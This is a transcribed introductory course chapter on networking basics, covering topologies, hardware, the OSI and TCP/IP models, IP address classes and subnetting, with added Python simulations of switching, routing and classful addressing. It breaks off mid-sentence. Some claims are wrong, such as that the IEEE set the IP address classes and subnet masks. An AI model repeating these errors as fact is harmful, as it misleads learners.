Basics of Networking

Transcription

Chapter-1
Basics of Networking
Session Objectives:
At the end of this Session, you will be able to understand –
Types of Network Configuration
Network Transmission Technologies
Types of Network
Basic Types of Topologies
Network Hardware Components
The TCP/IP Reference Model
Protocols and Networks in the TCP/IP Model Initially
IP Address Classes and Structure
_______________________________________________________________________________________
Cyber Security Level -1 /1
INTRODUCTION
“Computer Networking” is the engineering discipline concerned with communication between
computer systems or devices. Networking is sometimes considered a sub-discipline of
Telecommunications, Computer Science, Information Technology, and Computer Engineering.
A network is any set of computers connected to each other with the ability to exchange
data. A computer network is the collection of network hardware like LANs, MANs, WANs,
routers, hubs, protocols etc.; thus it is an interconnected collection of autonomous
computers. Two computers are said to be interconnected if they are able to exchange
information, whether via copper wires, fiber optics, satellite communication etc. But if
one computer can forcibly start, stop, or control another one, the computers are not
autonomous. A system with one control unit and many slaves is not a network; nor is a
large computer with remote printers and terminals.
1.1 Types of Network Configuration
There are two types of network configuration,
1. Peer-to-Peer Networks
2. Client/ Server Networks.
1.1.1 Peer-to-peer networks
Peer-to-peer networks are more commonly implemented where fewer than 10 computers are
involved and where strict security is not required. All computers have the same status,
hence the term 'Peer' associated with this type of network. They communicate with each
other on similar layers (OSI/TCP/IP), where files and folders, such as word processing or
spreadsheet documents, can be shared across the network, and all the computers on the
same network can share devices, like printers, scanners, drives etc., which are
connected to any computer.
Figure 1.1: Peer to Peer
1.1.2 Client/ Server networks
Client/Server is an architecture where a Server provides services to all of its Clients on
the same Network. It is more suitable in scenarios where a large number of computers are
required in the same Network. A central computer, or 'Server', acts as the storage
location for the files and applications shared on the network. Usually the Server
configuration is higher than that of an average performance computer. The server also
controls the Network access or User Authentication of the other computers, which are
referred to as the 'client' computers.
Figure 1.2: File Server
1.2 NETWORK TRANSMISSION TECHNOLOGIES
The computer networks are broadly divided into two transmission technologies:
1. Broadcast Network
2. Point to Point Network
1.2.1 Broadcast networks
Broadcast networks have a single communication channel that is shared by all the
machines on the network. Short messages, called packets in certain contexts, sent by any
machine are received by all the computers; an address field within the packet specifies
for whom it is intended. The receiving machine checks this address field: if the packet
is intended for it, the machine accepts the packet, otherwise it rejects it. If a message
is sent to all the machines on the same network, this is known as Broadcasting.
1.2.2 Point to Point Networks
Point to point networks consist of many connections between individual pairs of
machines. To go from a source to a destination machine, a packet may have to first visit
one or more intermediate machines. Often multiple routes of different lengths are
possible, so routing algorithms play an important role in point to point networks.
1.3 TYPES OF NETWORK
1.3.1 LOCAL AREA NETWORKS
Local Area Networks, also known as LANs, are privately owned networks within a single
building or campus of up to a few kilometers in size. They are widely used to connect
personal computers and workstations in companies, offices and factories in order to
share resources and exchange information.
Figure 1.3
1.3.2 METROPOLITAN AREA NETWORK
A Metropolitan Area Network or MAN is basically a larger version of a LAN and normally
uses similar technology. It might cover a group of nearby corporate offices or a city and
might be either private or public. A MAN can support both voice and data and might
even be related to the local television network. A MAN just has one or two cables and
does not contain switching elements.
Figure 1.4
1.3.3 WIDE AREA NETWORKS
A Wide Area Network or WAN spans a large geographical area, often a country or a
continent. It contains a collection of machines, called hosts, intended for running user
programs. The hosts are connected by a communication subnet, or just subnet for short.
The job of the subnet is to carry messages from host to host, just as the telephone
system carries words from the speaker to the listener. It basically consists of
transmission lines and switching elements: transmission lines are used to move bits
around, and switching elements are specialized computers used to connect two or more
transmission lines.
All networks are made up of basic hardware building blocks to interconnect network
nodes, such as Network Interface Cards (NICs), Bridges, Hubs, Switches, and Routers.
In addition, some method of connecting these building blocks is required, usually in
the form of galvanic cable (most commonly Category 5/6 cable). Moreover, nowadays
Wireless Technology has started playing an important role in this type of Networking,
using Wi-Fi/WiMAX.
1.1, 1.2, 1.3 Check your Progress
Fill in the blanks
1) The server also controls the Network access or User Authentication of other computers which are
referred to the _______ computers.
2) If a message is sent to all the machines on the same network, it is known as ________.
3) A ________ spans a large geographical area often a country or a continent. It contains a collection of
machines intended for running machines host.
4) A ________ is basically larger version of LAN and normally uses similar technology.
1.4 Types of Topologies
The arrangement or mapping of the elements of a network gives rise to certain basic
topologies which may then be combined to form more complex topologies (hybrid
topologies). The most common types of topologies are as follows:
Star
Ring
Mesh
Tree
Hybrid
Figure 1.5
1.5 NETWORK HARDWARE COMPONENTS
1.5.1 Network Interface Cards
A network card, network adapter or NIC (network interface card) is a piece of
computer hardware designed to allow computers to communicate over a computer
network. It provides physical access to a networking medium and provides a low-level
addressing system through the use of MAC addresses. It allows users to connect to
each other either by using cables or wirelessly.
Figure 1.6 Network Interface Cards (NICs)
Bridges
A network bridge connects multiple network segments at the data link layer (layer 2) of
the OSI model. Bridges are similar to repeaters or network hubs, devices that connect
network segments at the physical layer; however, a bridge works by bridging, where
traffic from one network is managed rather than simply rebroadcast to adjacent network
segments.
Hubs
A hub is a piece of hardware which provides the connectivity of a segment of a network
by directing traffic through the network. It does this in a rudimentary way: it simply
copies the data to all of the nodes connected to the hub. Hubs are commonly used to
connect segments of a LAN. A hub contains multiple ports. When a packet arrives at
one port, it is copied to the other ports so that all segments of the LAN can see all
packets.
Figure 1.7 An 8 port Hub
Switches
Switches are networking devices that direct traffic to the correct node by filtering
and forwarding packets between nodes. Switches operate at the data link layer (layer 2)
and sometimes the network layer (layer 3) of the OSI Reference Model and therefore
support any packet protocol. LANs that use switches to join segments are called
switched LANs or, in the case of Ethernet networks, switched Ethernet LANs. In a
circuit-switched data network, a switch is used to create a virtual circuit between
pairs of endpoints. This means that it creates a path from the source node to the
destination node.
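The practical difference between a hub, which copies every packet to every port, and a switch, which filters and forwards only to the node a packet is addressed to, is easiest to see in a small simulation. The following is an added example written for this page, not code from the course; the MAC addresses and port numbers are constructed, and the switch models a generic MAC-learning bridge (learn the source on the ingress port, flood unknown or broadcast destinations, forward known ones to a single port).

```python
# Added example (not from the course text): simulate a hub and a learning switch
# so the filtering difference is visible. MAC addresses and port numbers are
# constructed sample values; the switch models a generic MAC-learning bridge.
from __future__ import annotations

from dataclasses import dataclass

BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


@dataclass
class Frame:
    src_mac: str
    dst_mac: str
    payload: str = ""


class Hub:
    """A hub repeats whatever arrives on one port to every other port."""

    def __init__(self, ports: int) -> None:
        self.ports = ports

    def forward(self, frame: Frame, in_port: int) -> list[int]:
        # Every other port sees the frame, whoever it is addressed to.
        return [p for p in range(self.ports) if p != in_port]


class Switch:
    """A learning switch remembers which port each source MAC was seen on."""

    def __init__(self, ports: int) -> None:
        self.ports = ports
        self.mac_table: dict[str, int] = {}

    def forward(self, frame: Frame, in_port: int) -> list[int]:
        # Learn: the sender is reachable through the port the frame came in on.
        self.mac_table[frame.src_mac] = in_port
        out_port = self.mac_table.get(frame.dst_mac)
        # Unknown unicast and broadcast frames are flooded like a hub would;
        # a known destination is forwarded to exactly one port (filtering).
        if frame.dst_mac == BROADCAST_MAC or out_port is None:
            return [p for p in range(self.ports) if p != in_port]
        return [] if out_port == in_port else [out_port]


def ports_seeing_third_frame() -> dict[str, list[int]]:
    """Send A->B, B->A, then A->B again through an 8-port hub and switch.

    Returns, per device, the ports that receive the third frame.
    """
    a, b = "00:00:00:00:00:0a", "00:00:00:00:00:0b"   # constructed MACs on ports 0 and 1
    flows = [(Frame(a, b), 0), (Frame(b, a), 1), (Frame(a, b, "payload"), 0)]
    result: dict[str, list[int]] = {}
    for name, device in (("hub", Hub(8)), ("switch", Switch(8))):
        seen: list[int] = []
        for frame, in_port in flows:
            seen = device.forward(frame, in_port)
        result[name] = seen
    return result


if __name__ == "__main__":
    # The hub delivers the third frame to ports 1-7, the switch only to port 1.
    print(ports_seeing_third_frame())
```

The hub result is why a host on a hubbed segment can observe every other host's traffic, whereas on the switch only the learned port receives the frame once both sides have been seen.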
Figure 1.8 Examples of 24 port Switches
Routers
Routers are networking devices that forward data packets along networks, using
headers and forwarding tables to determine the best path along which to forward the
packets. Routers also provide interconnectivity between like and unlike devices on the
network. This is accomplished by examining the header of a data packet. They use
protocols such as ICMP to communicate with each other and configure the best route
between any two hosts. A router is connected to at least two networks, commonly two
LANs or WANs or a LAN and its ISP's network. Routers are usually located at gateways,
the places where two or more networks connect. Many household DSL and Cable Modems
are also routers.
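The forwarding decision described above, reading the destination from the packet header and picking the forwarding-table entry with the longest matching prefix, is shown in the following added example. It is not code from the course; the networks, next hops and interface names are constructed sample values, and the 0.0.0.0/0 entry plays the role of the default route.

```python
# Added example (not from the course text): a router's forwarding decision.
# The router reads the destination address from the packet header and picks the
# forwarding-table entry with the longest matching prefix, falling back to the
# default route (network 0.0.0.0). All networks, next hops and interface names
# are constructed sample values.
import ipaddress

# (destination network, next hop or None if directly connected, outgoing interface)
SAMPLE_TABLE = [
    ("0.0.0.0/0",      "203.0.113.1",   "wan0"),  # default route: everything else
    ("192.168.0.0/24", None,            "lan0"),  # directly connected LAN
    ("192.168.1.0/24", None,            "lan1"),  # directly connected LAN
    ("10.0.0.0/8",     "192.168.1.254", "lan1"),  # reachable via a neighbour router
    ("10.20.0.0/16",   "192.168.1.253", "lan1"),  # more specific route inside 10/8
]


def build_table(entries):
    """Parse dotted networks once so lookups can test membership directly."""
    return [(ipaddress.ip_network(net), hop, iface) for net, hop, iface in entries]


def longest_prefix_match(table, dst):
    """Return the most specific entry containing dst, or None if nothing matches."""
    dst_ip = ipaddress.ip_address(dst)
    best = None
    for net, hop, iface in table:
        if dst_ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, hop, iface)
    return best


def forward(table, packet):
    """Decide where a packet goes from its header's destination field."""
    match = longest_prefix_match(table, packet["dst"])
    if match is None:
        return {"action": "drop", "reason": "no route"}
    net, hop, iface = match
    # With no next hop the destination is on the attached segment, so the
    # router delivers to the host itself rather than to another router.
    return {
        "action": "forward",
        "route": str(net),
        "interface": iface,
        "next_hop": hop if hop is not None else packet["dst"],
    }


if __name__ == "__main__":
    table = build_table(SAMPLE_TABLE)
    for dst in ("192.168.0.7", "10.20.5.1", "10.1.1.1", "198.51.100.9"):
        print(dst, forward(table, {"src": "192.168.0.2", "dst": dst}))
```

A destination inside 10.20.0.0/16 matches both 10/8 and 10.20/16; the longer prefix wins, which is what "best path" means for a plain forwarding table. Real routers keep this table in a trie for speed, but the decision rule is the same.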
A registered jack (RJ) is a standardized physical interface for connecting
telecommunications equipment (commonly, a telephone jack) or computer networking
equipment. The standard designs for these connectors and their wiring are named
RJ11, RJ14, RJ45, etc. These interface standards are most commonly used in North
America, though some interfaces are used world-wide.
Figure 1.9
1.5.2 CABLING
Introduction
Unshielded Twisted Pair cable is by far the most popular cable around the world. UTP
cable is used not only for networking but also for the traditional telephone (UTP-Cat 1).
There are 6 different UTP categories and, depending on what you want to achieve, you
need the appropriate type of cable. UTP-CAT5 is the most popular UTP cable; it came to
replace the good old coaxial cable, which was not able to keep up with the constantly
growing need for faster and more reliable networks.
Characteristics
The characteristics of UTP are very good and make it easy to work with, install, expand
and troubleshoot. We are going to look at the different wiring schemes available for
UTP, how to create a straight-through UTP cable, rules for safe operation and a lot of
other cool stuff!
So let's have a quick look at each of the UTP categories available today:
Figure 1.10
Category 1/2/3/4/5/6 – a specification for the type of copper wire (most telephone and
network wire is copper) and jacks. The number (1, 3, 5, etc) refers to the revision of the
specification and in practical terms refers to the number of twists inside the wire (or the
quality of connection in a jack).
CAT1 is typically telephone wire. This type of wire is not capable of supporting computer
network traffic and is not twisted. It is also used by phone companies who provide ISDN,
where the wiring between the customer's site and the phone company's network uses
CAT 1 cable.
CAT2, CAT3, CAT4, CAT5 and CAT6 are network wire specifications. This type of wire
can support computer network and telephone traffic. CAT2 is used mostly for token ring
networks, supporting speeds up to 4 Mbps. For higher network speeds (100Mbps plus)
you must use CAT5 wire, but for 10Mbps CAT3 will suffice. CAT3, CAT4 and CAT5
cable are actually 4 pairs of twisted copper wires and CAT5 has more twists per inch
than CAT3 therefore can run at higher speeds and greater lengths. The "twist" effect of
each pair in the cables will cause any interference presented/picked up on one cable to
be cancelled out by the cable's partner which twists around the initial cable. CAT3 and
CAT4 are both used for Token Ring and have a maximum length of 100 meters.
CAT6 wire was originally designed to support gigabit Ethernet (although there are
standards that will allow gigabit transmission over CAT5 wire, that's CAT 5e). It is similar
to CAT5 wire, but contains a physical separator between the 4 pairs to further reduce
electromagnetic interference.
THE OSI REFERENCE MODEL
The concept of how a modern-day network operates can be understood by dissecting it
into seven layers. This seven-layer model is known as the OSI Reference Model and
defines how the vast majority of the digital networks on earth function. OSI is the
acronym for Open Systems Interconnection, which was an effort formed by the
International Organization for Standardization in 1982 with the goal of producing a
standard reference model for the hardware and software connection of digital
equipment. The important concept to realize about the OSI Reference Model is that it
does not define a network standard, but rather provides guidelines for the creation of
network standards.
The OSI model has become so widely accepted a concept that almost all major network
standards in the industry are described entirely in terms of its seven-layer model. Though
seven layers may appear to make a network overly complex, the seven-layer OSI Model
has proven over the past twenty years to be the most efficient and effective way to
understand this extremely complex subject.
Figure 1.11
1.4, 1.5 Check your Progress
Fill in the blanks
1) A __________ connects multiple network segments at the data link layer (layer 2) of the OSI model.
2) __________ is a piece of computer hardware designed to allow computers to communicate over a
computer network.
3) __________ also provide interconnectivity between like and unlike devices on the network.
4) __________ is typically telephone wire.
1.6 The TCP/IP Reference Model
Let us now move on to the TCP/IP reference model that is used in wide area computer
networks and for the successful operation of the worldwide Internet. This architecture
was started in 1974 and differed from its predecessor in the functionality of its layers.
The TCP/IP model is not the same as the OSI model. There is no universal agreement
regarding how to define TCP/IP with a layered model, but it is generally agreed that there
are fewer layers than the seven layers of the OSI model. The TCP/IP model is defined in 4
layers, as mentioned below:
Figure 1.12
1) Internet layer:
A packet-switching network depends upon a connectionless internetwork layer. This layer,
known as the internet layer, is the linchpin that holds the whole design together. Its job
is to allow hosts to insert packets into any network and have them delivered independently
to the destination. They may arrive in a different order than they were sent, in which
case it is the job of the higher layers to rearrange them in order to deliver them to the
proper destination.
The internet layer specifies an official packet format and protocol known as the Internet
Protocol (IP). The job of the internet layer is to transport IP packets to the appropriate
destination. Packet routing is a very essential task in order to avoid congestion. For
these reasons it is said that the TCP/IP internet layer performs the same function as the
OSI network layer.
2) Transport layer:
In the TCP/IP model, the layer above the internet layer is known as the transport layer.
It is designed to permit entities on the source and destination hosts to carry on a
conversation. It specifies 2 end-to-end protocols:
a) TCP
It is a reliable connection-oriented protocol that permits a byte stream originating on one
machine to be transported without error to any machine in the internet. It divides the
incoming byte stream into discrete messages and passes each one on to the internet
layer. At the destination, the receiving TCP process reassembles the received messages
into the output stream. TCP deals with flow control to make sure a fast sender cannot
swamp a slow receiver with more messages than it can handle.
b) UDP
It is an unreliable, connectionless protocol for applications that do not want TCP's
sequencing or flow control and wish to provide their own. It is also used for client-server
type request-reply queries and applications in which prompt delivery is more important
than accurate delivery, such as transmitting speech or video.
3) Application Layer:
In the TCP/IP model, the session and presentation layers are not present. The Application
layer sits on top of the Transport layer. It includes all the higher-level protocols, such
as virtual terminal (TELNET), file transfer (FTP) and electronic mail (SMTP).
The virtual terminal protocol permits a user on one machine to log into a distant machine
and work there. The file transfer protocol offers a way to move data efficiently from one
machine to another. Electronic mail was originally handled as a form of file transfer, but
later a specialized protocol was developed for it. The Application Layer defines the
following protocols:
a) File Transfer Protocol (FTP)
It was designed to permit reliable transfer of files across different platforms. To ensure
reliability, FTP uses TCP at the transport layer. FTP offers simple commands and makes
the differences in storage methods across networks transparent to the user. The FTP
client is able to interact with any FTP server; therefore the FTP server must also be able
to interact with any FTP client. FTP does not offer a user interface, but it does offer an
application program interface for file transfer. The client part of the protocol is called
FTP and the server part of the protocol is known as FTPd. The suffix "d" means Daemon;
this is a legacy from UNIX computing, where a daemon is a piece of software running on a
server that offers a service.
b) Hyper Text Transfer Protocol
HTTP permits applications such as browsers to upload and download web pages. It again
makes use of TCP at the transport layer to ensure reliability. HTTP is a connectionless
protocol that sends a request, receives a response and then disconnects the connection.
HTTP delivers HTML documents plus all of the other components supported within HTML,
such as JavaScript, VBScript and applets.
c) Simple Mail Transfer Protocol
By using TCP, SMTP sends email to other computers that support the TCP/IP protocol
suite. SMTP provides an extension to the local mail services that existed in the early
years of LANs. It supervises the sending of email from the local mail host to a remote mail
host. It is not responsible for accepting mail from local users or distributing received
mail to recipients; this is the responsibility of the local mail system. SMTP makes use of
TCP to establish a connection to the remote mail host; the mail is sent, any waiting mail
is requested, and then the connection is closed. It can also return a forwarding address
if the intended recipient no longer receives email at that destination. To enable mail to
be delivered across differing systems, a mail gateway is used.
d) Simple Network Management Protocol
SNMP is used as the standardized protocol for the transport of network management
information. Managed network devices can be queried by a managing computer to return
details about their status and level of activity. Monitoring software can also trigger
alarms if certain performance criteria drop below acceptable limits. At the transport
layer, SNMP uses UDP. The use of UDP reduces network traffic overheads.
4) The Host to Network Layer:
Below the internet layer is a great void. The TCP/IP reference model does not really say
much about what happens here, except to point out that the host has to connect to the
network using some protocol so it can transmit IP packets over it. This protocol is not
specified and varies from host to host and network to network.
1.6, 1.7 Check your Progress
Fill in the blanks
1) _________ network depends upon a connectionless Internetwork layer.
2) _________ is a reliable connection-oriented protocol that permits a byte stream originating on one
machine to be transported without error on any machine in the internet.
3) _________ is an unreliable, connectionless protocol for applications that do not want TCP’s
sequencing on flow control and wish to offer their own.
4) By using TCP, _________ sends email to other computers that support the TCP/IP protocol suite.
1.8 IP Address Classes and Structure
When the IEEE committee sat down to sort out the range of numbers that were going to
be used by all computers, they came up with 5 different ranges or, as we call them,
"Classes" of IP Addresses, and when someone applies for IP Addresses they are given a
certain range within a specific "Class" depending on the size of their network.
To keep things as simple as possible, let's first have a look at the 5 different Classes:
Figure 1.13
In the above table, you can see the 5 Classes. A is the first Class and E is the last Class.
The first 3 classes (A, B and C) are used to identify workstations, routers, switches and
other devices, whereas the last 2 Classes (D and E) are reserved for special use.
As you would already know an IP Address consists of 32 Bits, which means it's 4 bytes
long. The first octet (first 8 Bits or first byte) of an IP Address is enough for us to
determine the Class to which it belongs. And, depending on the Class to which the IP
Address belongs, we can determine which portion of the IP Address is the Network ID
and which the Node ID.
For example, if I told you that the first octet of an IP Address is "168" then, using the
above table, you would notice that it falls within the 128-191 range, which makes it a
Class B IP Address.
1.8.1 Understanding the Classes
We are now going to have a closer look at the 5 Classes. If you remember, earlier I
mentioned that companies are assigned different IP ranges within these classes,
depending on the size of their network. For instance, if a company required 1000 IP
Addresses it would probably be assigned a range that falls within a Class B network
rather than a Class A or C.
Class A IP Addresses were designed for large networks, Class B for medium size
networks and Class C for smaller networks.
1.8.2 Introducing Network ID and Host ID concepts
We need to understand the Network ID and Host ID concept because it will help us to
fully understand why Classes exist. Putting it as simply as possible, an IP Address gives
us 2 pieces of valuable information:
1) It tells us which network the device is part of (Network ID).
2) It identifies that unique device within the network (Host ID/ Node ID).
Think of the Network ID as the suburb you live in and the Host ID your street in that
suburb. You can tell exactly where someone is if you have their suburb and street name.
In the same way, the Network ID tells us which network a particular computer belongs to
and the Host ID identifies that computer from all the rest that reside in the same
network.
The picture below gives you a small example to help you understand the concept:
Figure 1.14
Explanation:
In the above picture, you can see a small network. We have assigned a Class C IP
Range for this network. Remember that Class C IP Addresses are for small networks.
Looking now at Host A, you will see that its IP Address is 192.168.0.2. The Network ID
portion of this IP Address is in blue, while the Host ID is in orange.
I suppose the next question someone would ask is: How do I figure out which portion of
the IP Address is the Network ID and which is the Host ID?
That's what we are going to answer next.
1.8.3 The Network and Host ID of each Class
The network Class helps us determine how the 4 byte, or 32 Bit, IP Address is divided
between network and node portions. The table below shows you (in binary) how the
Network ID and Host ID changes depending on the Class:
Figure 1.15
Explanation:
The table above might seem confusing at first but it's actually very simple. We will take
Class A as an example and analyse it so you can understand exactly what is happening
here:
Any Class A network has a total of 7 bits for the Network ID (bit 8 is always set to 0) and
24 bits for the Host ID. Now all we need to do is calculate how many networks and hosts
those bits give us:
2 to the power of 7 = 128 Networks, and for the hosts: 2 to the power of 24 = 16,777,216
hosts in each Network, of which 2 cannot be used because one is the Network Address
and the other is the Network Broadcast address (see the table towards the end of this
page). This is why when we calculate the "valid" hosts in a network we always subtract
"2". So if I asked you how many "valid" hosts you can have on a Class A Network, you
should answer 16,777,214 and NOT 16,777,216.
Below you can see all this in one picture:
Figure 1.16
The same story applies for the other 2 Classes we use, that is Class B and Class C; the
only difference is that the number of networks and hosts changes because the bits
assigned to them are different for each class.
Class B networks have 14 bits for the Network ID (Bits 15 and 16 are set and can't be
changed) and 16 bits for the Host ID, which means you can have up to '2 to the power of
14' = 16,384 Networks and '2 to the power of 16' = 65,536 Hosts in each Network, of
which 2 cannot be used because one is the Network Address and the other is the
Network Broadcast address (see the table towards the end of this page). So if I asked
you how many "valid" hosts you can have on a Class B Network, you should answer
65,534 and NOT 65,536.
Figure 1.17
Class C networks have 21 bits for the Network ID (Bits 22, 23 and 24 are set and can't be
changed) and 8 bits for the Host ID, which means you can have up to '2 to the power of
21' = 2,097,152 Networks and '2 to the power of 8' = 256 Hosts in each Network, of
which 2 cannot be used because one is the Network Address and the other is the
Network Broadcast address (see the table towards the end of this page). So if I asked
you how many "valid" hosts you can have on a Class C Network, you should answer
254 and NOT 256.
Now, even though we have 3 Classes of IP Addresses that we can use, there are some
IP Addresses that have been reserved for special use. This doesn't mean you can't
assign them to a workstation but in the case that you did, it would create serious
problems within your network. For this reason it's best that you avoid using these IP
Addresses.
The following table shows the IP Addresses that you should avoid using:
IP Address: Function
Network 0.0.0.0: Refers to the default route. This route is used to simplify the routing
tables used by IP.
Network 127.0.0.0: Reserved for Loopback. The Address 127.0.0.1 is often used to refer
to the local host. Using this Address, applications can address the local host as if it
were a remote host.
IP Address with all host bits set to "0" (Network Address), e.g. 192.168.0.0: Refers to
the actual network itself. For example, network 192.168.0.0 can be used to identify
network 192.168. This type of notation is often used within routing tables.
IP Address with all node bits set to "1" (Subnet / Network Broadcast), e.g.
192.168.255.255: IP Addresses with all node bits set to "1" are local network broadcast
addresses and must NOT be used. Some examples: 125.255.255.255 (Class A),
190.30.255.255 (Class B), 203.31.218.255 (Class C). See "Multicasts" & "Broadcasts" for
more info.
IP Address with all bits set to "1" (Network Broadcast), e.g. 255.255.255.255: The IP
Address with all bits set to "1" is a broadcast address and must NOT be used. These are
destined for all nodes on a network, no matter what IP Address they might have.
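The classful rules of sections 1.8 to 1.8.3 (Class from the first octet, Network ID and Host ID split by the default mask, networks and "valid" hosts as 2 to the power of the bits minus 2) and the reserved addresses in the table above can all be checked with one short function. This is an added example written for this page, not code from the course; the first-octet ranges are the standard classful ranges, assumed here because Figure 1.13 is not reproduced in the transcription, and the sample addresses are constructed.

```python
# Added example (not from the course text): classful analysis of an IPv4 address.
# From the first octet it finds the Class, splits the address into Network ID and
# Host ID with that Class's default mask, counts networks and "valid" hosts
# (2^host_bits - 2), and flags the reserved addresses from the table above.
# The first-octet ranges are the standard classful ranges, assumed here because
# the course's Figure 1.13 is not reproduced; sample addresses are constructed.
import ipaddress

# Class -> (first-octet range, network bits, leading bits fixed by the class)
CLASS_RANGES = {
    "A": (range(0, 128), 8, 1),          # 0xxxxxxx: 7 usable network bits
    "B": (range(128, 192), 16, 2),       # 10xxxxxx: 14 usable network bits
    "C": (range(192, 224), 24, 3),       # 110xxxxx: 21 usable network bits
    "D": (range(224, 240), None, None),  # multicast, special use
    "E": (range(240, 256), None, None),  # experimental, special use
}
ALL_ONES = 0xFFFFFFFF


def ip_class(addr: str) -> str:
    """Classify by the first octet, e.g. 168.x.x.x -> 'B' (128-191)."""
    first = int(ipaddress.IPv4Address(addr)) >> 24
    for name, (octets, _, _) in CLASS_RANGES.items():
        if first in octets:
            return name
    raise ValueError(f"not an IPv4 address: {addr}")


def classful_info(addr: str) -> dict:
    """Network ID, Host ID, counts and any reservation for addr under classful rules."""
    ip = int(ipaddress.IPv4Address(addr))
    info = {"class": ip_class(addr), "reserved": None}
    # Whole-address reservations come first (255.255.255.255 would otherwise be Class E).
    if ip == 0:
        info["reserved"] = "default route"
        return info
    if ip == ALL_ONES:
        info["reserved"] = "limited broadcast (all bits 1)"
        return info
    if ip >> 24 == 127:
        info["reserved"] = "loopback"
        return info
    _, net_bits, fixed = CLASS_RANGES[info["class"]]
    if net_bits is None:
        info["reserved"] = "special use (Class D/E)"
        return info
    host_bits = 32 - net_bits
    host_mask = (1 << host_bits) - 1
    net_mask = ALL_ONES ^ host_mask
    info.update({
        "default_mask": str(ipaddress.IPv4Address(net_mask)),
        "network_id": str(ipaddress.IPv4Address(ip & net_mask)),
        "host_id": str(ipaddress.IPv4Address(ip & host_mask)),
        "networks": 2 ** (net_bits - fixed),
        "valid_hosts": 2 ** host_bits - 2,  # minus network and broadcast address
    })
    if ip & host_mask == 0:
        info["reserved"] = "network address (host bits all 0)"
    elif ip & host_mask == host_mask:
        info["reserved"] = "network broadcast (host bits all 1)"
    return info


if __name__ == "__main__":
    for sample in ("192.168.0.2", "168.10.3.4", "10.0.0.1", "125.255.255.255",
                   "192.168.0.0", "127.0.0.1", "0.0.0.0", "255.255.255.255"):
        print(sample, classful_info(sample))
```

Running it on the text's own figures reproduces them: Host A at 192.168.0.2 is Class C with Network ID 192.168.0.0 and Host ID 0.0.0.2, a Class A address reports 128 networks and 16,777,214 valid hosts, and 125.255.255.255 is flagged as a Class A broadcast exactly as the table says.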
1.8.4 What is Subnetting?
When we subnet a network, we basically split it into smaller networks. For example,
when a set of IP Addresses is given to a company, e.g. 254 addresses, they might want to
"break" (the correct term is "partition") that one network into smaller ones, one for each
department. This way, their Technical department and Management department can
each have a small network of their own. By subnetting the network we can partition it
into as many smaller networks as we need, and this also helps reduce traffic and hides
the complexity of the network.
By default, all types of Classes (A, B and C) have a subnet mask; we call it the "Default
Subnet mask". You need to have one because:
1) All computers need the subnet mask field filled in when configuring IP
2) You need to set some logical boundaries in your network
3) You should at least enter the default subnet mask for the Class you're using
about IP Classes, Network IDs and Host IDs, the fact is that the Subnet mask is what
determines the Network ID and Host ID portion of an IP Address.
The table below clearly shows the subnet mask that applies for each network Class.
Figure 1.18
When dealing with subnet masks in the real world, we are free in most cases to use any
type of subnet mask in order to meet our needs. If for example we require one network
which can contain up to 254 computers, then a Class C network with its default subnet
mask will do fine, but if we need more, then we might consider a Class B network with
its default subnet mask.
Note that the default subnet masks have been set by the IEEE committee, the same
guys that set and approve the different standards and protocols.
We will have a closer look at this later on and see how we can achieve a Class C
network with more than 254 hosts.
1.8.5 Understanding the concept
Let's stop here for one moment and have a look at what I mean by partitioning one
network into smaller ones by using different subnet masks.
The picture below shows our example network (192.168.0.0). All computers here have
been configured with the default Class C subnet mask (255.255.255.0):
Figure 1.19
Because of the subnet mask we used, all these computers are part of the one network
marked in blue. This also means that any of these hosts (computers, router and
server) can communicate with each other.
If we now wanted to partition this network into smaller segments, then we would need to
change the subnet mask appropriately so we can get the desired result. Let's say we
needed to change the subnet mask from 255.255.255.0 to 255.255.255.224 on each
configured host.
The picture below shows us how the computers will see the network once the subnet
mask has changed:
Figure 1.20
In reality, we have just created 8 networks from the one large (blue) network we had, but
I am keeping things simple for now and showing only 2 of these smaller networks
because I want you to understand the concept of subnetting and see how important the
subnet mask is.
In the next pages which are to follow I will analyse in great depth the way subnetting
works and how to calculate it. It is very important that you understand the concepts
introduced in this section, so make sure you do, before continuing!
1.8.6 Subnetting Analysis
Understanding the use, and analysing different subnet masks
We know what a subnet mask is, but we haven't spoken (yet) about the different values
they take, and the guidelines we need when we use them. That's what we are going to
do here !
The truth is that you cannot take any subnet mask you like and apply it to a computer or any
other device. Depending on the mask you pick, you will either create a lot of routing and
communication problems, or the device will refuse to accept it at all (a valid mask is a run
of one-bits followed by a run of zero-bits; 255.0.255.0, for example, is not a subnet mask).
For this reason we are going to have a look at the various subnet masks so you know exactly
what you need to use, and how to use it. Most important, we are going to make sure we
understand WHY you need to choose specific subnet masks, depending on your needs. Most
people simply use a standard subnet mask without understanding what it does; that will not be
the case for you. Let's first have a look at the most common subnet masks, and then I'll show
you where these numbers come from :)
Common Subnet Masks
In order to keep this place tidy, we are going to see the common Subnet masks for each
Class. Looking at each Class's subnet mask is possibly the best and easiest way to
learn them.
Bits      Class A                       Class B                         Class C
borrowed
   0      255.0.0.0 (default mask)      255.255.0.0 (default mask)      255.255.255.0 (default mask)
   1      255.128.0.0 (default+1)       255.255.128.0 (default+1)       255.255.255.128 (default+1)
   2      255.192.0.0 (default+2)       255.255.192.0 (default+2)       255.255.255.192 (default+2)
   3      255.224.0.0 (default+3)       255.255.224.0 (default+3)       255.255.255.224 (default+3)
   4      255.240.0.0 (default+4)       255.255.240.0 (default+4)       255.255.255.240 (default+4)
   5      255.248.0.0 (default+5)       255.255.248.0 (default+5)       255.255.255.248 (default+5)
   6      255.252.0.0 (default+6)       255.255.252.0 (default+6)       255.255.255.252 (default+6)
   7      255.254.0.0 (default+7)       255.255.254.0 (default+7)       255.255.255.254 (default+7) *
   8      255.255.0.0 (default+8)       255.255.255.0 (default+8)       255.255.255.255 (default+8) **
* One host bit left: the classic 2^n - 2 rule gives no usable hosts. RFC 3021 allows this mask
  (/31) on point-to-point links, where both addresses are hosts and there is no broadcast address.
** No host bits left: a single address (a host route). 255.255.255.255 is also the limited
  broadcast address when it appears as a destination, which is why it is often labelled
  "reserved for broadcasts".
The above table might seem confusing at first, but don't despair! It's simple; you just need
to look at it in a different way. The trick to understanding the pattern is this: each Class
has its default subnet mask (the first row of the table), and all we are doing is borrowing
one bit at a time (from 1 all the way to 8) from the Host ID portion of that Class. Each row
shows the decimal numbers we get each time we borrow a bit from the Host ID portion. If you
can't see how these decimal numbers work out, read up on the Binary & IP page. Each time we
borrow a bit from the Host ID, we split the network into a different number of networks:
borrowing 3 bits from a Class C network, for example, partitions it into 2^3 = 8 smaller
networks. Let's take a look at a detailed example (which we will break into three parts) so
